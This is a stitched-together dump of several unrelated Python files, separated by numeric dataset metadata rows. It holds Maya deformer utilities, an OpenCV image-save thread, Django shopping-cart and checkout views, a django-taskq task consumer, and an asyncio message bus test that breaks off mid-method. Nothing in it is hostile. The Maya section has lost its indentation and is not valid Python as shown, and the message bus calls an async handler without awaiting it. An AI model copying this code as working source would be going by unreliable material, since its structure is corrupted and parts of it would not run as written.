@type bindPreMatrix: str
@param parent: Parent the deformer handle to the bind pre matrix transform
@type parent: bool
'''
# Check deformer
if not isDeformer(deformer):
raise Exception('Object "'+deformer+'" is not a valid deformer!')
if not cmds.objExists(deformer+'.bindPreMatrix'):
raise Exception('Deformer "'+deformer +
'" does not accept bindPreMatrix connections!')
# Get deformer handle
deformerHandle = cmds.listConnections(deformer+'.matrix', s=True, d=False)
if deformerHandle:
deformerHandle = deformerHandle[0]
else:
raise Exception('Unable to find deformer handle!')
# Check bindPreMatrix
if bindPreMatrix:
if not cmds.objExists(bindPreMatrix):
bindPreMatrix = cmds.createNode('transform', n=bindPreMatrix)
else:
# Build bindPreMatrix transform
prefix = deformerHandle.replace(deformerHandle.split('_')[-1], '')
bindPreMatrix = cmds.createNode('transform', n=prefix+'bindPreMatrix')
# Match transform and pivot
cmds.xform(bindPreMatrix, ws=True, matrix=cmds.xform(
deformerHandle, q=True, ws=True, matrix=True))
cmds.xform(bindPreMatrix, ws=True, piv=cmds.xform(
deformerHandle, q=True, ws=True, rp=True))
# Connect inverse matrix to localize cluster
cmds.connectAttr(
bindPreMatrix+'.worldInverseMatrix[0]', deformer+'.bindPreMatrix', f=True)
# Parent
if parent:
cmds.parent(deformerHandle, bindPreMatrix)
# Return result
return bindPreMatrix
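'''
Example (hypothetical): localize a cluster behind an animatable transform:
bindPreMatrix("cluster1", bindPreMatrix="cluster1_bpm", parent=True)
'''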
def pruneWeights(deformer, geoList=[], threshold=0.001):
'''
Set deformer component weights to 0.0 if the original weight value is below the given threshold
@param deformer: Deformer to prune weights on
@type deformer: str
@param geoList: The geometry objects whose components are checked for weight pruning
@type geoList: list
@param threshold: The weight threshold below which weights are zeroed
@type threshold: float
'''
# Check deformer
if not cmds.objExists(deformer):
raise Exception('Deformer "'+deformer+'" does not exist!')
# Check geometry
if type(geoList) == str:
geoList = [geoList]
if not geoList:
geoList = cmds.deformer(deformer, q=True, g=True)
if not geoList:
raise Exception('No geometry to prune weight for!')
for geo in geoList:
if not cmds.objExists(geo):
raise Exception('Geometry "'+geo+'" does not exist!')
# For each geometry
for geo in geoList:
# Get deformer member indices
memberIndexList = getDeformerSetMemberIndices(deformer, geo)
# Get weight list
weightList = getWeights(deformer, geo)
# Prune weights
pWeightList = [wt if wt > threshold else 0.0 for wt in weightList]
# Apply pruned weight list
setWeights(deformer, pWeightList, geo)
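'''
Example (hypothetical): zero out near-zero weights on one mesh:
pruneWeights("cluster1", geoList=["pSphere1"], threshold=0.001)
'''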
def pruneMembershipByWeights(deformer, geoList=[], threshold=0.001):
'''
Remove components from a specified deformer set if their weight value is below the set threshold
@param deformer: Deformer to remove components from
@type deformer: str
@param geoList: The geometry objects whose components are checked for removal
@type geoList: list
@param threshold: The weight threshold for removal
@type threshold: float
'''
# Check deformer
if not cmds.objExists(deformer):
raise Exception('Deformer "'+deformer+'" does not exist!')
# Check geometry
if type(geoList) == str:
geoList = [geoList]
if not geoList:
geoList = cmds.deformer(deformer, q=True, g=True)
if not geoList:
raise Exception('No geometry to prune weight for!')
for geo in geoList:
if not cmds.objExists(geo):
raise Exception('Geometry "'+geo+'" does not exist!')
# Get deformer set
deformerSet = getDeformerSet(deformer)
# For each geometry
allPruneList = []
for geo in geoList:
# Get Component Type
geoType = glTools.utils.geometry.componentType(geo)
# Get Deformer Member Indices
memberIndexList = getDeformerSetMemberIndices(deformer, geo)
# Get Weights
weightList = getWeights(deformer, geo)
# Get Prune List
pruneList = [memberIndexList[i] for i in range(
len(memberIndexList)) if weightList[i] <= threshold]
for i in range(len(pruneList)):
if isinstance(pruneList[i], (str, int)):  # the Python 2 'unicode' check is folded into str
pruneList[i] = '['+str(pruneList[i])+']'
elif type(pruneList[i]) == list:
pruneList[i] = [str(p) for p in pruneList[i]]
pruneList[i] = '['+']['.join(pruneList[i])+']'
pruneList[i] = geo+'.'+geoType+str(pruneList[i])
allPruneList.extend(pruneList)
# Prune deformer set membership
if pruneList:
cmds.sets(pruneList, rm=deformerSet)
# Return prune list
return allPruneList
def clean(deformer, threshold=0.001):
'''
Clean specified deformer.
Prune weights under the given tolerance and prune membership.
@param deformer: The deformer to clean.
@type deformer: str
@param threshold: Weight value tolerance for prune operations.
@type threshold: float
'''
# Print Message
print('Cleaning deformer: '+deformer+'!')
# Check Deformer
if not isDeformer(deformer):
raise Exception('Object "'+deformer+'" is not a valid deformer!')
# Prune Weights
glTools.utils.deformer.pruneWeights(deformer, threshold=threshold)
# Prune Membership
glTools.utils.deformer.pruneMembershipByWeights(
deformer, threshold=threshold)
def checkMultipleOutputs(deformer, printResult=True):
'''
Check the specified deformer for multiple output connections from a single plug.
@param deformer: Deformer to check for multiple output connections
@type deformer: str
@param printResult: Print results to the script editor
@type printResult: bool
'''
# Check deformer
if not isDeformer(deformer):
raise Exception('Deformer "'+deformer+'" is not a valid deformer!')
# Get outputGeometry plug
outGeomPlug = glTools.utils.attribute.getAttrMPlug(
deformer+'.outputGeometry')
if not outGeomPlug.isArray():
raise Exception('Attribute "'+deformer +
'.outputGeometry" is not an array attribute!')
# Get existing indices
indexList = om.MIntArray()
numIndex = outGeomPlug.getExistingArrayAttributeIndices(indexList)
# Check output plugs
returnDict = {}
for i in range(numIndex):
plugConn = cmds.listConnections(
deformer+'.outputGeometry['+str(indexList[i])+']', s=False, d=True, p=True)
# Check multiple outputs
if len(plugConn) > 1:
# Append to return value
returnDict[deformer+'.outputGeometry[' +
str(indexList[i])+']'] = plugConn
# Print connection info
if printResult:
print('Deformer output "'+deformer+'.outputGeometry['+str(
indexList[i])+']" has '+str(len(plugConn))+' outgoing connections:')
for conn in plugConn:
print('\t- '+conn)
# Return result
return returnDict
| 33.45554
| 123
| 0.677257
| 2,505
| 24,456
| 6.608383
| 0.155689
| 0.011176
| 0.018606
| 0.011961
| 0.399964
| 0.362752
| 0.352906
| 0.342938
| 0.333756
| 0.301317
| 0
| 0.002334
| 0.22931
| 24,456
| 730
| 124
| 33.50137
| 0.875955
| 0.217697
| 0
| 0.44385
| 0
| 0
| 0.089999
| 0.001217
| 0.002674
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.018717
| 0
| 0.141711
| 0.016043
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee74b61615725492239c5444cd5387bf60c2f49c
| 804
|
py
|
Python
|
util/save_image_worker.py
|
zigonk/CMPC-Refseg
|
0d59c90e9968ed836c695976ff90081e1c24378a
|
[
"MIT"
] | null | null | null |
util/save_image_worker.py
|
zigonk/CMPC-Refseg
|
0d59c90e9968ed836c695976ff90081e1c24378a
|
[
"MIT"
] | null | null | null |
util/save_image_worker.py
|
zigonk/CMPC-Refseg
|
0d59c90e9968ed836c695976ff90081e1c24378a
|
[
"MIT"
] | null | null | null |
import logging
import os
from queue import Queue
from threading import Thread
from time import time
import cv2
class SaveThread(Thread):
def __init__(self, queue):
Thread.__init__(self)
self.queue = queue
def run(self):
while True:
# Get the work from the queue and expand the tuple
save_path, im = self.queue.get()
try:
cv2.imwrite(save_path, im)
finally:
self.queue.task_done()
class SaveImageWorker:
def __init__(self):
self.save_queue = Queue()
self.save_thread = SaveThread(self.save_queue)
self.save_thread.daemon = True
self.save_thread.start()
def save_image(self, save_path, im):
self.save_queue.put((save_path, im))
| 27.724138
| 62
| 0.609453
| 102
| 804
| 4.568627
| 0.352941
| 0.120172
| 0.085837
| 0.060086
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003604
| 0.309701
| 804
| 29
| 63
| 27.724138
| 0.836036
| 0.059701
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16
| false
| 0
| 0.24
| 0
| 0.48
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee777920db42ef90f8ce8a58fb13a346a19081f4
| 7,444
|
py
|
Python
|
catalog/views.py
|
chancald/mask-ecommerce
|
1907007e726f989b6d99546e1b03ad5891d65715
|
[
"Apache-2.0"
] | null | null | null |
catalog/views.py
|
chancald/mask-ecommerce
|
1907007e726f989b6d99546e1b03ad5891d65715
|
[
"Apache-2.0"
] | null | null | null |
catalog/views.py
|
chancald/mask-ecommerce
|
1907007e726f989b6d99546e1b03ad5891d65715
|
[
"Apache-2.0"
] | null | null | null |
from django.shortcuts import render, get_object_or_404, redirect
from django.contrib import messages
from django.utils import timezone
from django.views.generic import ListView, DetailView, View
from .models import Item, Order, OrderItem, Address, Promo
from .forms import AddressForm, PromoForm
from django.http import HttpResponseRedirect
from django.core.mail import send_mail
class HomeView(ListView):
model = Item
template_name = 'home.html'
class ProductDetail(DetailView):
model = Item
template_name = 'product.html'
class OrderSummaryView(View):
def get(self, *args, **kwargs):
order = Order.objects.get(user=self.request.user, ordered=False)
context = {
'order': order
}
return render(self.request, 'order_summary.html', context)
def add_to_cart(request, slug):
item = get_object_or_404(Item, slug=slug)
order_item, created = OrderItem.objects.get_or_create(item=item, user=request.user, ordered=False)
order_qs = Order.objects.filter(user=request.user, ordered=False)
if order_qs.exists():
order = order_qs[0]
if order.items.filter(item__slug=item.slug).exists():
messages.success(request, f"{item.title} ya esta en el carrito")
return redirect('product', slug=slug)
else:
order.items.add(order_item)
order.save()
messages.success(request, f"{item.title} fue anadido al carrito")
return redirect('product', slug=slug)
else:
ordered_date = timezone.now()
order = Order.objects.create(user=request.user, ordered=False, ordered_date=ordered_date)
order.items.add(order_item)
order.save()
messages.success(request, f"{item.title} fue anadido al carrito")
return redirect('product', slug=slug)
def remove_from_cart(request, slug):
item = get_object_or_404(Item, slug=slug)
order_item, created = OrderItem.objects.get_or_create(item=item, user=request.user, ordered=False)
order_qs = Order.objects.filter(user=request.user, ordered=False)
if order_qs.exists():
order = order_qs[0]
if order.items.filter(item__slug=item.slug).exists():
OrderItem.objects.filter(id=order_item.id).delete()
messages.warning(request, f"{item.title} fue eliminado del carrito")
return redirect('product', slug=slug)
else:
messages.warning(request, f"{item.title} no esta en el carrito")
return redirect('product', slug=slug)
else:
messages.warning(request, f"{item.title} no hay una orden activa")
return redirect('product', slug=slug)
def add_item_quantity(request, slug):
item = get_object_or_404(Item, slug=slug)
order_item, created = OrderItem.objects.get_or_create(item=item, user=request.user, ordered=False)
order_item.quantity += 1
order_item.save()
return redirect('order_summary')
def remove_item_quantity(request, slug):
item = get_object_or_404(Item, slug=slug)
order_item, created = OrderItem.objects.get_or_create(item=item, user=request.user, ordered=False)
order_qs = Order.objects.filter(user=request.user, ordered=False)
order = order_qs[0]
if order_item.quantity > 1:
order_item.quantity -= 1
order_item.save()
else:
order.items.remove(order_item)
order.save()
messages.warning(request, f"{item.title} fue eliminado del carrito")
return redirect('order_summary')
def remove_from_cart_summary(request, slug):
item = get_object_or_404(Item, slug=slug)
order_item, created = OrderItem.objects.get_or_create(item=item, user=request.user, ordered=False)
order_qs = Order.objects.filter(user=request.user, ordered=False)
order = order_qs[0]
OrderItem.objects.filter(id=order_item.id).delete()
messages.warning(request, f"{item.title} el producto fue eliminado del carrito")
return redirect('order_summary')
class AfterCheckoutView(DetailView):
def get(self, *args, **kwargs):
order = Order.objects.get(user=self.request.user, ordered=False)
context = {
'order': order
}
return render(self.request, 'after_checkout.html', context)
class CheckoutView(View):
def get(self, *args, **kwargs):
form = AddressForm()
order = Order.objects.get(user=self.request.user, ordered=False)
context = {
'form': form,
'order': order,
}
return render(self.request, 'checkout.html', context)
def post(self, *args, **kwargs):
order = Order.objects.get(user=self.request.user, ordered=False)
form = AddressForm(self.request.POST or None)
context = {}
#promo_form = PromoForm(self.request.POST or None)
if 'submit_promo' in self.request.POST:
if form.is_valid():
promo_code = form.cleaned_data.get('promo_code')
promo = Promo.objects.filter(title=promo_code)
if promo:
order.promo.clear()
order.promo.add(promo[0])
order.save()
else:
order.promo.clear()
order.save()
messages.warning(self.request, f"{promo_code} no es un codigo valido de promoción")
if 'submit_info' in self.request.POST:
if form.is_valid():
first_name = form.cleaned_data.get('first_name')
last_name = form.cleaned_data.get('last_name')
phone = form.cleaned_data.get('phone')
email = form.cleaned_data.get('email')
street_address = form.cleaned_data.get('street_address')
street_address_2 = form.cleaned_data.get('street_address_2')
save_info = form.cleaned_data.get('save_info')
default = form.cleaned_data.get('default')
use_default = form.cleaned_data.get('use_default')
state_option = form.cleaned_data.get('state_option')
payment_option = form.cleaned_data.get('payment_option')
# Create address and save it
address = Address(
user=self.request.user,
street_address=street_address,
street_address_2=street_address_2,
state_option=state_option,
)
address.save()
# Print form data
print(form.cleaned_data)
# Send emails
subject = 'Mascarillas y mas - Su orden fue recibida'
message = f'¡Gracias por ordenar!\n{first_name} {last_name} Su orden fue recibida. Lo antes posible alguien lo estara contactando para confirmar su orden.'
from_email = 'chandler240@gmail.com'
recipient_list = [email,]
send_mail(subject, message, from_email, recipient_list)
return redirect('after_checkout')
else:
# Check errors
# print(form.errors)
messages.warning(self.request, "Los campos Nombre, Apellido, Telefono y Email son necesarios")
# always return an address
return redirect('checkout')
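# A minimal sketch of the urls.py wiring these views expect; the route names
# match the redirects used above, while the paths themselves are assumptions:
#
#     from django.urls import path
#     from . import views
#
#     urlpatterns = [
#         path('', views.HomeView.as_view(), name='home'),
#         path('product/<slug:slug>/', views.ProductDetail.as_view(), name='product'),
#         path('order-summary/', views.OrderSummaryView.as_view(), name='order_summary'),
#         path('checkout/', views.CheckoutView.as_view(), name='checkout'),
#         path('after-checkout/', views.AfterCheckoutView.as_view(), name='after_checkout'),
#     ]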
| 42.537143
| 171
| 0.623052
| 894
| 7,444
| 5.038031
| 0.189038
| 0.036634
| 0.05595
| 0.071492
| 0.601021
| 0.541075
| 0.48468
| 0.471137
| 0.444494
| 0.444494
| 0
| 0.006102
| 0.273509
| 7,444
| 175
| 172
| 42.537143
| 0.826553
| 0.021628
| 0
| 0.482993
| 0
| 0.006803
| 0.130692
| 0.005916
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061224
| false
| 0
| 0.054422
| 0
| 0.272109
| 0.006803
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee799216d33c9ed30924cce3dbebfa13f696710c
| 7,220
|
py
|
Python
|
taskq/consumer.py
|
ipsosante/django-taskq
|
933893c51bf512983b1ca0fc0b8db523d37c9996
|
[
"MIT"
] | null | null | null |
taskq/consumer.py
|
ipsosante/django-taskq
|
933893c51bf512983b1ca0fc0b8db523d37c9996
|
[
"MIT"
] | 5
|
2018-11-22T13:42:10.000Z
|
2019-09-16T13:00:41.000Z
|
taskq/consumer.py
|
ipsosante/django-taskq
|
933893c51bf512983b1ca0fc0b8db523d37c9996
|
[
"MIT"
] | null | null | null |
import importlib
import logging
import threading
from time import sleep
import timeout_decorator
from django_pglocks import advisory_lock
from django.conf import settings
from django.db import transaction
from django.db.models import Q
from django.utils import timezone
from .constants import TASKQ_DEFAULT_CONSUMER_SLEEP_RATE, TASKQ_DEFAULT_TASK_TIMEOUT
from .exceptions import Cancel, TaskLoadingError, TaskFatalError
from .models import Task
from .scheduler import Scheduler
from .task import Taskify
from .utils import task_from_scheduled_task, traceback_filter_taskq_frames, ordinal
logger = logging.getLogger('taskq')
class Consumer:
"""Collect and executes tasks when they are due."""
def __init__(self, sleep_rate=TASKQ_DEFAULT_CONSUMER_SLEEP_RATE, execute_tasks_barrier=None):
"""Create a new Consumer.
:param sleep_rate: The time in seconds the consumer will wait between
each run loop iteration (mostly useful when testing).
:param execute_tasks_barrier: Install the passed barrier in the
`execute_tasks_barrier` method to test its thread-safety. DO NOT USE
IN PRODUCTION.
"""
super().__init__()
self._should_stop = threading.Event()
self._scheduler = Scheduler()
# Test parameters
self._sleep_rate = sleep_rate
self._execute_tasks_barrier = execute_tasks_barrier
def stop(self):
logger.info('Consumer was asked to quit. '
'Terminating process in less than %ss.', self._sleep_rate)
self._should_stop.set()
@property
def stopped(self):
return self._should_stop.is_set()
def run(self):
"""The main entry point to start the consumer run loop."""
logger.info('Consumer started.')
while not self.stopped:
self.create_scheduled_tasks()
self.execute_tasks()
sleep(self._sleep_rate)
def create_scheduled_tasks(self):
"""Register new tasks for each scheduled (recurring) tasks defined in
the project settings.
"""
due_tasks = self._scheduler.due_tasks
if not due_tasks:
return
# Multiple instances of taskq rely on an advisory lock.
# This lock is self-exclusive so that only one session can hold it at a time.
# https://www.postgresql.org/docs/11/explicit-locking.html#ADVISORY-LOCKS
with advisory_lock("taskq_create_scheduled_tasks"):
for scheduled_task in due_tasks:
task_exists = Task.objects.filter(
name=scheduled_task.name,
due_at=scheduled_task.due_at
).exists()
if task_exists:
continue
task = task_from_scheduled_task(scheduled_task)
task.save()
self._scheduler.update_all_tasks_due_dates()
@transaction.atomic
def execute_tasks(self):
due_tasks = self.fetch_due_tasks()
# Only used when testing. Ask the consumers to wait for each others at
# the barrier.
if self._execute_tasks_barrier is not None:
self._execute_tasks_barrier.wait()
self.process_tasks(due_tasks)
def fetch_due_tasks(self):
# Multiple instances of taskq rely on select_for_update().
# This mechanism will lock selected rows until the end of the transaction.
# We also fetch STATUS_RUNNING in case of previous inconsistent state.
due_tasks = Task.objects.filter(
Q(status=Task.STATUS_QUEUED) | Q(status=Task.STATUS_RUNNING),
due_at__lte=timezone.now()
).select_for_update(skip_locked=True)
return due_tasks
def process_tasks(self, due_tasks):
for due_task in due_tasks:
self.process_task(due_task)
def process_task(self, task):
"""Load and execute the task"""
if task.timeout is None:
timeout = getattr(settings, 'TASKQ_TASK_TIMEOUT', TASKQ_DEFAULT_TASK_TIMEOUT)
else:
timeout = task.timeout
if not task.retries:
logger.info('%s : Started', task)
else:
nth = ordinal(task.retries)
logger.info('%s : Started (%s retry)', task, nth)
task.status = Task.STATUS_RUNNING
task.save()
def _execute_task():
function, args, kwargs = self.load_task(task)
self.execute_task(function, args, kwargs)
try:
if timeout.total_seconds():
assert threading.current_thread() is threading.main_thread()
timeout_decorator.timeout(seconds=timeout.total_seconds(), use_signals=True)(_execute_task)()
else:
_execute_task()
except TaskFatalError as e:
logger.info('%s : Fatal error', task)
self.fail_task(task, e)
except Cancel:
logger.info('%s : Canceled', task)
task.status = Task.STATUS_CANCELED
except timeout_decorator.TimeoutError as e:
logger.info('%s : Timed out', task)
self.fail_task(task, e)
except Exception as e:
if task.retries < task.max_retries:
logger.info('%s : Failed, will retry', task)
self.retry_task_later(task)
else:
logger.info('%s : Failed, exceeded max retries', task)
self.fail_task(task, e)
else:
logger.info('%s : Success', task)
task.status = Task.STATUS_SUCCESS
finally:
task.save()
def retry_task_later(self, task):
task.status = Task.STATUS_QUEUED
task.retries += 1
task.update_due_at_after_failure()
def fail_task(self, task, error):
task.status = Task.STATUS_FAILED
exc_traceback = traceback_filter_taskq_frames(error)
type_name = type(error).__name__
exc_info = (type(error), error, exc_traceback)
logger.exception('%s : %s %s', task, type_name, error, exc_info=exc_info)
def load_task(self, task):
function = self.import_taskified_function(task.function_name)
args, kwargs = task.decode_function_args()
return (function, args, kwargs)
def import_taskified_function(self, import_path):
"""Load a @taskified function from a python module.
Returns TaskLoadingError if loading of the function failed.
"""
# https://stackoverflow.com/questions/3606202
module_name, unit_name = import_path.rsplit('.', 1)
try:
module = importlib.import_module(module_name)
except (ImportError, SyntaxError) as e:
raise TaskLoadingError(e)
try:
obj = getattr(module, unit_name)
except AttributeError as e:
raise TaskLoadingError(e)
if not isinstance(obj, Taskify):
msg = f'Object "{import_path}" is not a task'
raise TaskLoadingError(msg)
return obj
def execute_task(self, function, args, kwargs):
"""Execute the code of the task"""
with transaction.atomic():
function._protected_call(args, kwargs)
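# A minimal usage sketch (assumes Django settings are configured for taskq):
#
#     consumer = Consumer(sleep_rate=1)
#     try:
#         consumer.run()          # blocks; polls for and executes due tasks
#     except KeyboardInterrupt:
#         consumer.stop()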
| 34.380952
| 109
| 0.635457
| 875
| 7,220
| 5.025143
| 0.273143
| 0.021833
| 0.020014
| 0.022743
| 0.104389
| 0.043894
| 0.012281
| 0
| 0
| 0
| 0
| 0.002126
| 0.283241
| 7,220
| 209
| 110
| 34.545455
| 0.847536
| 0.165097
| 0
| 0.114286
| 0
| 0
| 0.055264
| 0.004747
| 0
| 0
| 0
| 0
| 0.007143
| 1
| 0.107143
| false
| 0
| 0.157143
| 0.007143
| 0.307143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee7b13e3f8add887be12393c811c00fdb0fd0ddc
| 14,786
|
py
|
Python
|
async_message_bus_test.py
|
ifurusato/ros
|
77b1361e78f68f00ba2d3e3db908bb5ce0f973f5
|
[
"MIT"
] | 9
|
2020-10-12T08:49:55.000Z
|
2021-07-23T14:20:05.000Z
|
async_message_bus_test.py
|
fanmuzhi/ros
|
04534a35901341c4aaa9084bff3d46851795357d
|
[
"MIT"
] | 12
|
2020-07-22T19:08:58.000Z
|
2022-02-03T03:17:03.000Z
|
async_message_bus_test.py
|
fanmuzhi/ros
|
04534a35901341c4aaa9084bff3d46851795357d
|
[
"MIT"
] | 3
|
2020-07-19T20:43:19.000Z
|
2022-03-02T09:15:51.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020-2021 by Murray Altheim. All rights reserved. This file is part
# of the Robot Operating System project, released under the MIT License. Please
# see the LICENSE file included as part of this package.
#
# author: Murray Altheim
# created: 2021-02-24
# modified: 2021-02-24
#
# see: https://www.aeracode.org/2018/02/19/python-async-simplified/
import sys, time, asyncio, itertools, traceback
from abc import ABC, abstractmethod
from collections import deque as Deque
import uuid
import random
from colorama import init, Fore, Style
init()
from lib.event import Event
from lib.ticker import Ticker
from lib.message import Message
from lib.message_factory import MessageFactory
from lib.logger import Logger, Level
#from mock.ifs import MockIntegratedFrontSensor
# ..............................................................................
class MessageBus():
'''
An asyncio message bus: delivers each published Message to the queue of every current Subscription.
'''
def __init__(self, level=Level.INFO):
self._log = Logger('bus', level)
self._log.debug('initialised...')
self._subscriptions = set()
self._log.debug('ready.')
# ..........................................................................
@property
def subscriptions(self):
'''
Return the current set of Subscriptions.
'''
return self._subscriptions
# ..........................................................................
def publish(self, message: Message):
'''
Publishes the Message to all Subscribers.
'''
self._log.info(Style.BRIGHT + 'publish message: {}'.format(message))
for queue in self._subscriptions:
queue.put_nowait(message)
# ..............................................................................
class Subscription():
'''
A subscription on the MessageBus.
'''
def __init__(self, message_bus, level=Level.WARN):
self._log = Logger('subscription', level)
self._log.debug('__init__')
self._message_bus = message_bus
self.queue = asyncio.Queue()
def __enter__(self):
self._log.debug('__enter__')
self._message_bus._subscriptions.add(self.queue)
return self.queue
def __exit__(self, type, value, traceback):
self._log.debug('__exit__')
self._message_bus._subscriptions.remove(self.queue)
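# Example (hypothetical): a consumer holds a Subscription for the lifetime
# of a block, exactly as Subscriber.subscribe() does below:
#
#     with Subscription(message_bus) as queue:
#         message = await queue.get()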
# ..............................................................................
class Subscriber(ABC):
'''
Abstract subscriber functionality, to be subclassed by any classes
that subscribe to a MessageBus.
'''
def __init__(self, name, message_bus, level=Level.WARN):
self._log = Logger('subscriber-{}'.format(name), level)
self._name = name
self._log.debug('Subscriber created.')
self._message_bus = message_bus
self._log.debug('ready.')
# ..............................................................................
@property
def name(self):
return self._name
# ..............................................................................
def filter(self, message):
'''
Abstract filter: if not overridden, the default is simply to pass the message.
'''
self._log.info(Fore.RED + 'FILTER Subscriber.filter(): {} rxd msg #{}: priority: {}; desc: "{}"; value: '.format(\
self._name, message.number, message.priority, message.description) + Fore.WHITE + Style.NORMAL + '{}'.format(message.value))
return message
# ..............................................................................
@abstractmethod
async def handle_message(self, message):
'''
Abstract function that receives a message obtained from a Subscription
to the MessageBus, performing actions based on receipt.
This is to be subclassed to provide message handling/processing functionality.
'''
_event = message.event
_message = self.filter(message)
if _message:
self._log.info(Fore.GREEN + 'FILTER-PASS: Subscriber.handle_message(): {} rxd msg #{}: priority: {}; desc: "{}"; value: '.format(\
self._name, message.number, message.priority, message.description) + Fore.WHITE + Style.NORMAL + '{} .'.format(_message.value))
else:
self._log.info(Fore.GREEN + Style.DIM + 'FILTERED-OUT: Subscriber.handle_message() event: {}'.format(_event.name))
return _message
# ..............................................................................
@abstractmethod
async def subscribe(self):
'''
Subscribe to the message bus and consume messages until a SHUTDOWN
event arrives (or this subscriber randomly decides it has had enough).
'''
self._log.debug('subscribe called.')
await asyncio.sleep(random.random() * 8)
self._log.info(Fore.GREEN + 'Subscriber {} has subscribed.'.format(self._name))
_message_count = 0
_message = Message(-1, Event.NO_ACTION, None) # initial non-null message
with Subscription(self._message_bus) as queue:
while _message.event != Event.SHUTDOWN:
_message = await queue.get()
# self._log.info(Fore.GREEN + '1. calling handle_message()...')
await self.handle_message(_message)  # handle_message is a coroutine; without await it would never run
# self._log.info(Fore.GREEN + '2. called handle_message(), awaiting..')
_message_count += 1
self._log.info(Fore.GREEN + 'Subscriber {} rxd msg #{}: priority: {}; desc: "{}"; value: '.format(\
self._name, _message.number, _message.priority, _message.description) + Fore.WHITE + Style.NORMAL + '{}'.format(_message.value))
if random.random() < 0.1:
self._log.info(Fore.GREEN + 'Subscriber {} has received enough'.format(self._name))
break
self._log.info(Fore.GREEN + 'Subscriber {} is shutting down after receiving {:d} messages.'.format(self._name, _message_count))
# ..............................................................................
class Publisher(ABC):
'''
Abstract publisher, subclassed by any classes that publish to a MessageBus.
'''
def __init__(self, message_factory, message_bus, level=Level.INFO):
self._log = Logger('pub', level)
self._log.info(Fore.MAGENTA + 'Publisher: create.')
self._message_factory = message_factory
self._message_bus = message_bus
self._counter = itertools.count()
self._log.debug('ready.')
# ..........................................................................
def get_message_of_type(self, event, value):
'''
Provided an Event type and a message value, returns a Message
generated from the MessageFactory.
'''
return self._message_factory.get_message(event, value)
    def get_random_event_type(self):
        '''
        Returns a randomly-selected Event type from a fixed set of candidates.
        '''
        _types = [ Event.STOP, Event.INFRARED_PORT, Event.INFRARED_STBD, Event.FULL_AHEAD, Event.ROAM, Event.EVENT_R1 ]
        return random.choice(_types)
# ..........................................................................
@abstractmethod
async def publish(self, iterations):
        '''
        Publishes one randomly-typed message per iteration, followed by a
        final SHUTDOWN message that terminates the subscribers.
        '''
self._log.info(Fore.MAGENTA + Style.BRIGHT + 'Publish called.')
for x in range(iterations):
self._log.info(Fore.MAGENTA + 'Publisher: I have {} subscribers now'.format(len(self._message_bus.subscriptions)))
_uuid = str(uuid.uuid4())
_message = self.get_message_of_type(self.get_random_event_type(), 'msg_{:d}-{}'.format(x, _uuid))
_message.number = next(self._counter)
self._message_bus.publish(_message)
await asyncio.sleep(1)
_shutdown_message = self.get_message_of_type(Event.SHUTDOWN, 'shutdown')
self._message_bus.publish(_shutdown_message)
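    # Shutdown note: the final SHUTDOWN message acts as a sentinel that fans
    # out to every subscriber queue, ending each receive loop (see
    # Subscriber.subscribe). A minimal sketch of the same pattern with a bare
    # asyncio.Queue (the names here are illustrative only):
    #
    #     SENTINEL = object()
    #     async def consume(queue):
    #         while (item := await queue.get()) is not SENTINEL:
    #             process(item)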
# ..............................................................................
class MySubscriber(Subscriber):
'''
Extends Subscriber as a typical subscriber use case class.
'''
def __init__(self, name, ticker, message_bus, level=Level.INFO):
super().__init__(name, message_bus, level)
self._log.info(Fore.YELLOW + 'MySubscriber-{}: create.'.format(name))
self._ticker = ticker
self._ticker.add_callback(self.tick)
self._discard_ignored = True
_queue_limit = 10
self._deque = Deque([], maxlen=_queue_limit)
self._log.debug('ready.')
# ..............................................................................
def queue_peek(self):
'''
        Returns a peek at the oldest Message in the queue (the next to be
        popped), or None if the queue is empty.
'''
return self._deque[-1] if self._deque else None
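    # Deque orientation note (assuming Deque aliases collections.deque):
    # handle_message() uses appendleft() and tick() uses pop(), so the oldest
    # message sits at index -1 and messages are consumed FIFO, e.g.:
    #
    #     d = Deque([], maxlen=3)
    #     d.appendleft('a'); d.appendleft('b')
    #     d[-1]    # -> 'a'  (peek at the oldest)
    #     d.pop()  # -> 'a'  (consume the oldest)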
# ..............................................................................
    def queue_length(self):
        '''
        Returns the number of messages currently in the queue.
        '''
        return len(self._deque)
# ..............................................................................
    def print_queue_contents(self):
        '''
        Returns a formatted, line-per-message string describing the current
        queue contents.
        '''
        str_list = []
for _message in self._deque:
str_list.append('-- msg#{}/{}/{}\n'.format(_message.number, _message.eid, _message.event.name))
return ''.join(str_list)
# ..............................................................................
def tick(self):
'''
        Callback from the Ticker, used to pop any pending messages from the queue.
'''
_peek = self.queue_peek()
if _peek: # queue was not empty
self._log.debug(Fore.WHITE + 'TICK! {:d} in queue.'.format(len(self._deque)))
            # we're only interested in types Event.INFRARED_PORT or Event.INFRARED_STBD
if _peek.event is Event.INFRARED_PORT or _peek.event is Event.INFRARED_STBD:
_message = self._deque.pop()
